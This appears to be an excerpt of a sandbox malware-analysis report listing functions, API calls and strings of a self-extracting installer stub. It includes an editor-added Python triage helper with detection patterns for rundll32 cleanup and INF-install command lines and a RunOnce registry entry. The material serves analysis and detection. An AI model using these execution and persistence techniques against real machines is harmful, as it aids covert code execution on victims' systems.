3052 13fb63382 SendDlgItemMessageA 3051->3052 3055 13fb63372 3051->3055 3052->3055 3054 13fb632cf 3053->3054 3056 13fb632f8 GetDesktopWindow 3053->3056 3054->3055 3057 13fb632f0 EndDialog 3054->3057 3058 13fb64938 14 API calls 3056->3058 3057->3055 3059 13fb63309 6 API calls 3058->3059 3059->3055

Callgraph

[Callgraph: interactive graph rendering not reproduced]

Control-flow Graph

[Control-flow graph: interactive graph rendering not reproduced]
Memory Dump Source
• Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
• Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
Similarity
• API ID: Free$Resource$Local$Library$CompareFindStringValuememset$AddressCloseDirectoryErrorLastLoadLockOpenProcQuerySizeofSystemmemcpy_s
• String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$tha$wextract_cleanup0
• API String ID: 4182703008-1896170548
• Opcode ID: 9fbedc8ee68849e796393d59cf24a39954ca5b20f47fe15cbd13ed5894424a0e
• Instruction ID: 9ea9c219b04611c92a42380e19669ca2f93f26a7609429b0fe2288a284144083
• Opcode Fuzzy Hash: 9fbedc8ee68849e796393d59cf24a39954ca5b20f47fe15cbd13ed5894424a0e
• Instruction Fuzzy Hash: 14F172F2A14A81C6FB609F65E8407EAF7A0F7447A8F54013EDA4943AACDB79C746C700
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph: interactive graph rendering not reproduced]

Memory Dump Source
• Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
• Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
Similarity
• API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
• String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
• API String ID: 178549006-1367052505
• Opcode ID: 086f7c6c0e1ddd0f103fce1b769f8d6c6a2bd86ba3a3403e30a996cf38a0207b
• Instruction ID: 7dd7dc1a92c00ac26efa26a085c2f4accc65344eef3c7bac0479a1e2821c8c0e
• Opcode Fuzzy Hash: 086f7c6c0e1ddd0f103fce1b769f8d6c6a2bd86ba3a3403e30a996cf38a0207b
• Instruction Fuzzy Hash: 1A714DB2B14B8496EB109F61E8547DAF3A5F784BA4F50113AD98E47BACDF38C606C740
Uniqueness
• Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Control-flow graph of the function at 13fb615f8 (graph image omitted; blocks were colour-coded executed / not executed). Win32 calls on the graph: CompareStringA, GetFileAttributesA, LocalAlloc, GetPrivateProfileIntA, GetPrivateProfileStringA, GetShortPathNameA.
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                    • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                    • API String ID: 383838535-3591563988
                                                                    • Opcode ID: 8d2c9183c473727e79f3868567cf13be57a801c48a812a4ca0eda7e59c6b39be
                                                                    • Instruction ID: 71ffaa89fa12ec41a3f6c89a424957855d315545d94342d89f8eaacad2551499
                                                                    • Opcode Fuzzy Hash: 8d2c9183c473727e79f3868567cf13be57a801c48a812a4ca0eda7e59c6b39be
                                                                    • Instruction Fuzzy Hash: E1E1AFB6B0578096EF118F24E8503EAE7A1E745BA8F54413ADA9D03B9DDB39C70BC700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Control-flow graph of the function at 13fb66028 (graph image omitted; blocks were colour-coded executed / not executed). Win32 calls on the graph: LocalAlloc, GetLastError, lstrcmpA, LocalFree, GetTempPathA, GetWindowsDirectoryA, GetDriveTypeA, GetFileAttributesA, GetDiskFreeSpaceA, MulDiv, CreateDirectoryA, SetFileAttributesA.
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
                                                                    • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                    • API String ID: 3973824516-1687894704
                                                                    • Opcode ID: 3a816d39f8404eceacc9f53d27fff6f0972f8e2c600a2447ebf23cbd64aef1a2
                                                                    • Instruction ID: a39ec325346f0a99808b0a7a1cfb56aa8885e016b1bc0eba5498775fcd1dade7
                                                                    • Opcode Fuzzy Hash: 3a816d39f8404eceacc9f53d27fff6f0972f8e2c600a2447ebf23cbd64aef1a2
                                                                    • Instruction Fuzzy Hash: FDC183F2A1468082FB609F25E4507EAF7A2F795764F54403DDA894BA9DDB3DCA07CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectoryErrorLast$Message$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                    • API String ID: 948580687-552775693
                                                                    • Opcode ID: 1d10b06ffb60c2f9a4994c8529384c1a3f72a6229e0869c97220415a699bab90
                                                                    • Instruction ID: edc6d730c96096715be3504c7a5be0511f4cc8171ae2d9d68ddc2c18e580fbfa
                                                                    • Opcode Fuzzy Hash: 1d10b06ffb60c2f9a4994c8529384c1a3f72a6229e0869c97220415a699bab90
                                                                    • Instruction Fuzzy Hash: 9191B2B6A1474086E720DF21E4547EAF7A5F788768F50013EDA8A47BA8DF3DC646CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                    • String ID: *MEMCAB$CABINET
                                                                    • API String ID: 1305606123-2642027498
                                                                    • Opcode ID: 0c6c46a489d0fda5dc98469ed81d9ee631a82016382c4a4d309c554a0bb4008b
                                                                    • Instruction ID: e07c374c19bdd3fb0e4384c397836b3d16de743a24b7971b5039f9d9e1cba660
                                                                    • Opcode Fuzzy Hash: 0c6c46a489d0fda5dc98469ed81d9ee631a82016382c4a4d309c554a0bb4008b
                                                                    • Instruction Fuzzy Hash: 905126B5A11B4186FB609F51E8947E6E3A1BB887A9F80413ED94902AACDF3CC257C740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Control-flow graph of the function at 13fb62e28 (graph image omitted; blocks were colour-coded executed / not executed). Win32 calls on the graph: GetSystemDirectoryA, LoadLibraryA, GetProcAddress, DecryptFileA, FreeLibrary, SetCurrentDirectoryA, GetWindowsDirectoryA, GetLastError.
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$ErrorLastLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystemWindows
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                    • API String ID: 89276366-2184067320
                                                                    • Opcode ID: 7298bcec91a35e74cce7102c22ba9d824c4011d00aaa7125e6909d84ce458b88
                                                                    • Instruction ID: 5f766564e1806c435d21420cc33a46ed279bb23d25bcd893bddac1dcd85e5065
                                                                    • Opcode Fuzzy Hash: 7298bcec91a35e74cce7102c22ba9d824c4011d00aaa7125e6909d84ce458b88
                                                                    • Instruction Fuzzy Hash: 84614AF1F0064186FF609B21E9503E5E3A4EB947B4F54403EE989826ADDB6CCB47C750
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
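The String ID fields of the functions above (the RunOnce / advpack.dll DelNodeRunDLL32 cleanup routine, the .INF / RUNPROGRAM post-extraction routine, the CABINET resource loader and the advapi32 DecryptFileA routine) together describe a self-extracting stub that unpacks into C:\Users\user\AppData\Local\Temp\IXP000.TMP\, runs a program or INF section from there, and registers a rundll32 cleanup job under RunOnce. The following triage helper is an added example by the editor, not Joe Sandbox output or code from the sample: its marker strings are copied from those String ID fields, the grouping into behaviours and the reading of the stub as Microsoft's IExpress/wextract extractor are the editor's assumptions, and every input (the byte blob and the process-creation events) is constructed for illustration.

```python
"""Triage helper for the self-extractor stub whose strings the report lists.
Editor's example code, not sandbox output. Marker strings are copied from the
report's String ID fields; the behaviour grouping and the IExpress/wextract
identification are assumptions; all sample inputs below are constructed."""
import re
from typing import Dict, List

# Marker strings from the report's String ID fields, grouped by the behaviour
# they indicate (grouping is an editorial assumption).
SFX_MARKERS: Dict[str, List[bytes]] = {
    "extract_dir": [b"IXP000.TMP", b"msdownld.tmp"],
    "runonce_cleanup": [b"wextract_cleanup", b"DelNodeRunDLL32", b"advpack.dll",
                        b"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce"],
    "post_extract": [b"RUNPROGRAM", b"InstallHinfSection", b"AdvancedINF",
                     b"DefaultInstall", b"Command.com /c %s"],
    "cab_resource": [b"CABINET", b"*MEMCAB"],
    "efs_decrypt": [b"DecryptFileA", b"advapi32.dll"],
}


def classify_sfx(blob: bytes) -> Dict[str, List[str]]:
    """Return, per behaviour group, the marker strings present in a dump or PE."""
    hits: Dict[str, List[str]] = {}
    for group, needles in SFX_MARKERS.items():
        found = [n.decode() for n in needles if n in blob]
        if found:
            hits[group] = found
    return hits


def is_sfx_stub(blob: bytes) -> bool:
    """Heuristic verdict: the IXP temp-dir marker together with the RunOnce
    cleanup marker is specific to the extractor stub; either alone is not."""
    hits = classify_sfx(blob)
    return "extract_dir" in hits and "runonce_cleanup" in hits


# Command-line shapes derived from the report's format strings:
#   rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"
#   rundll32.exe %s,InstallHinfSection %s 128 %s
CLEANUP_RE = re.compile(
    r'rundll32(?:\.exe)?\s+(?P<dll>\S*advpack\.dll),DelNodeRunDLL32\s+"(?P<target>[^"]+)"',
    re.IGNORECASE)
INF_RE = re.compile(
    r'rundll32(?:\.exe)?\s+(?P<dll>\S+),InstallHinfSection\s+(?P<section>\S+)\s+128\s+(?P<inf>\S+)',
    re.IGNORECASE)
IXP_DIR_RE = re.compile(r'\\Temp\\IXP\d{3}\.TMP\\', re.IGNORECASE)


def parse_cleanup_command(cmd: str) -> Dict[str, str]:
    """Decode the DelNodeRunDLL32 cleanup line the stub registers under RunOnce:
    returns the advpack.dll path used and the directory scheduled for deletion."""
    m = CLEANUP_RE.search(cmd)
    if not m:
        raise ValueError("not a DelNodeRunDLL32 cleanup command")
    return {"dll": m.group("dll"), "target": m.group("target")}


def flag_process_event(image: str, cmdline: str) -> List[str]:
    """Detection logic for process-creation telemetry: labels rundll32 calls that
    match the stub's cleanup or INF-install patterns, and anything referencing
    an IXP temp extraction directory. Returns the list of reasons (empty = clean)."""
    reasons: List[str] = []
    if image.lower().endswith("rundll32.exe"):
        if CLEANUP_RE.search(cmdline):
            reasons.append("advpack DelNodeRunDLL32 cleanup")
        if INF_RE.search(cmdline):
            reasons.append("InstallHinfSection from rundll32")
    if IXP_DIR_RE.search(cmdline) or IXP_DIR_RE.search(image):
        reasons.append("IXP temp extraction directory")
    return reasons


# Constructed sample inputs (not taken from the sandbox run).
SAMPLE_DUMP = (
    b"\x00" * 8
    + b"C:\\Users\\user\\AppData\\Local\\Temp\\IXP000.TMP\\\x00"
    + b"wextract_cleanup%d\x00"
    + b"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\x00"
    + b'rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"\x00'
    + b"RUNPROGRAM\x00CABINET\x00"
)
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\rundll32.exe",
     'rundll32.exe C:\\Windows\\System32\\advpack.dll,DelNodeRunDLL32 '
     '"C:\\Users\\user\\AppData\\Local\\Temp\\IXP000.TMP\\"'),
    ("C:\\Windows\\System32\\rundll32.exe",
     "rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 "
     "C:\\Users\\user\\AppData\\Local\\Temp\\IXP000.TMP\\setup.inf"),
    ("C:\\Windows\\System32\\notepad.exe", "notepad.exe readme.txt"),
]

if __name__ == "__main__":
    print("markers:", classify_sfx(SAMPLE_DUMP), "verdict:", is_sfx_stub(SAMPLE_DUMP))
    for image, cmd in SAMPLE_EVENTS:
        print(image, "->", flag_process_event(image, cmd) or "clean")
```

The verdict deliberately requires two independent markers: IXP000.TMP on its own also appears in benign IExpress packages, while the RunOnce cleanup entry combined with it is what the report's stub writes. The process-event check is the runtime counterpart: the same rundll32 advpack.dll / setupapi.dll command lines the stub formats are what shows up in process-creation logs on the victim host.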

                                                                    Control-flow Graph

                                                                    Control-flow graph of the function at 13fb65e4c (graph image omitted; blocks were colour-coded executed / not executed). Win32 calls on the graph: GetSystemInfo, CreateDirectoryA, RemoveDirectoryA, GetLastError.
                                                                    APIs
                                                                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,000000013FB62A5F), ref: 000000013FB65EE4
                                                                    • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,000000013FB62A5F), ref: 000000013FB65F91
                                                                    • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,000000013FB62A5F), ref: 000000013FB65FCB
                                                                      • Part of subcall function 000000013FB65D44: RemoveDirectoryA.KERNELBASE(0000000A,000000013FB62A5F), ref: 000000013FB65DAF
                                                                      • Part of subcall function 000000013FB65D44: GetFileAttributesA.KERNELBASE ref: 000000013FB65DB8
                                                                      • Part of subcall function 000000013FB65D44: GetTempFileNameA.KERNEL32 ref: 000000013FB65DDB
                                                                      • Part of subcall function 000000013FB65D44: DeleteFileA.KERNEL32 ref: 000000013FB65DED
                                                                      • Part of subcall function 000000013FB65D44: CreateDirectoryA.KERNEL32 ref: 000000013FB65DF8
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,0000000A,000000013FB62A5F), ref: 000000013FB65FD3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$File$CreateRemove$AttributesDeleteErrorInfoLastNameSystemTemp
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                    • API String ID: 3170954203-3938192293
                                                                    • Opcode ID: d116721c738d00c164cd3631cc6f2c60d9e10c0bd18d4cd6bae3e49295d042fb
                                                                    • Instruction ID: 48f9f66e994672114261fd681da69c27328384eef84a36ec3a0e47fb19ecf8fc
                                                                    • Opcode Fuzzy Hash: d116721c738d00c164cd3631cc6f2c60d9e10c0bd18d4cd6bae3e49295d042fb
                                                                    • Instruction Fuzzy Hash: AD516CF2F1478482FB648F25E9143E9E3A4A7847A0F98413ED94A4669DDF79CB16C310
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Control-flow graph of the function at 13fb64478 (graph image omitted; blocks were colour-coded executed / not executed). Win32 calls on the graph: CreateProcessA, WaitForSingleObject, GetExitCodeProcess, CloseHandle (twice), GetLastError (twice), FormatMessageA.
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: CloseErrorHandleLastProcess$CodeCreateExitFormatMessageObjectSingleWait
                                                                    • String ID:
                                                                    • API String ID: 3794558871-3916222277
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (image not available; executed/not-executed colouring lost): function 13fb629e4 calls GetVersion, GetModuleHandleW, GetProcAddress, CloseHandle and ExitWindowsEx, with subcalls to 13fb62b24, 13fb62e28, 13fb630c4, 13fb64a70, 13fb62174 and 13fb61b44.
APIs
Strings
Similarity
• API ID: Handle$AddressCloseExitModuleProcVersionWindows
• String ID: @$HeapSetInformation$Kernel32.dll
• API String ID: 1302179841-1204263913
Uniqueness
Uniqueness Score: -1.00%

APIs
Similarity
• API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
• String ID:
• API String ID: 836429354-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (image not available; executed/not-executed colouring lost): function 13fb630c4 calls LocalFree, SetFileAttributesA, DeleteFileA, RegOpenKeyExA, RegDeleteValueA, RegCloseKey and SetCurrentDirectoryA, with subcalls to 13fb67c20, 13fb6745c and 13fb61f00.
APIs
Strings
Similarity
• API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
• API String ID: 3049360512-509129362
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (image not available; executed/not-executed colouring lost): function 13fb62174 calls RegOpenKeyExA, RegQueryInfoKeyA, RegQueryValueExA and RegCloseKey, with a subcall to 13fb620c0.
APIs
Strings
Similarity
• API ID: OpenQuery$CloseInfoValue
• String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
• API String ID: 2209512893-559176071
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (image not available)
APIs
Strings
Similarity
• API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
• String ID: IXP$IXP%03d.TMP
• API String ID: 1082909758-3932986939
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (image not available)
APIs
  • Part of subcall function 000000013FB64CC0: FindResourceA.KERNEL32 ref: 000000013FB64CE8
  • Part of subcall function 000000013FB64CC0: SizeofResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64CF3
  • Part of subcall function 000000013FB64CC0: FindResourceA.KERNEL32 ref: 000000013FB64D13
  • Part of subcall function 000000013FB64CC0: LoadResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64D1E
  • Part of subcall function 000000013FB64CC0: LockResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64D27
  • Part of subcall function 000000013FB64CC0: memcpy_s.MSVCRT ref: 000000013FB64D40
  • Part of subcall function 000000013FB64CC0: FreeResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64D49
• LocalAlloc.KERNEL32(?,?,?,?,00000000,000000013FB62E5F), ref: 000000013FB65C31
• GetLastError.KERNEL32 ref: 000000013FB65C5D
• LocalFree.KERNEL32 ref: 000000013FB65CB3
  • Part of subcall function 000000013FB64A70: LoadStringA.USER32 ref: 000000013FB64B04
  • Part of subcall function 000000013FB64A70: MessageBoxA.USER32 ref: 000000013FB64B3E
Strings
Similarity
• API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
• String ID: $<None>$UPROMPT
• API String ID: 957408736-2569542085
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (image not available)
APIs
Strings
Similarity
• API ID: FileLocal$AllocAttributesCloseCreateErrorFreeHandleLast
• String ID: TMP4351$.TMP
• API String ID: 3233701622-2619824408
Uniqueness
Uniqueness Score: -1.00%

APIs
Similarity
• API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
• String ID:
• API String ID: 2995914023-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: CreateFile$lstrcmp
• String ID: *MEMCAB
• API String ID: 1301100335-3211172518
                                                                    • Opcode ID: 8a2ec7afe2b51a4f3a104787b125c2abcbb1919d4f600384edff3266c69d9446
                                                                    • Instruction ID: d3ffdab35a020976b7d6d6a08f85a4d46693fb249ebd0bdf12a9d6b03eca823c
                                                                    • Opcode Fuzzy Hash: 8a2ec7afe2b51a4f3a104787b125c2abcbb1919d4f600384edff3266c69d9446
                                                                    • Instruction Fuzzy Hash: 1A61B2F2E1478486FB608F15E9807A9A691F355BB8F544339CAB6037DCCB78C6578B00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: FileTime$AttributesDateItemLocalText
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                    • API String ID: 851750970-552775693
                                                                    • Opcode ID: 7d875f159341b7230950f18f2f71abc3d82ac459eefbd0f33785da50a5c8e793
                                                                    • Instruction ID: 55dbf16a687e866e39d22fff77731713149766cf6b6f0c2783e6199397948509
                                                                    • Opcode Fuzzy Hash: 7d875f159341b7230950f18f2f71abc3d82ac459eefbd0f33785da50a5c8e793
                                                                    • Instruction Fuzzy Hash: 95519EF2A10A4181FB608B21E8507EDA3A0F784BB1F44113EDA5E472DDDA38CBA3C750
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: __getmainargs
                                                                    • String ID: 0f6
                                                                    • API String ID: 3565562838-657941818
                                                                    • Opcode ID: 275af33df96ac1c1a804af0c188c72368faf2eba7cb6a2ae800b8ec4454fcbff
                                                                    • Instruction ID: 1f56c6ddb861adfc94777e08b2a427723e27af103a669b3ee4395437b10a97cb
                                                                    • Opcode Fuzzy Hash: 275af33df96ac1c1a804af0c188c72368faf2eba7cb6a2ae800b8ec4454fcbff
                                                                    • Instruction Fuzzy Hash: 4AE0EAF6E01A469AEA10AF95F9407D4B7A0F35872AF80412AC94D56338DB3C835BCB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
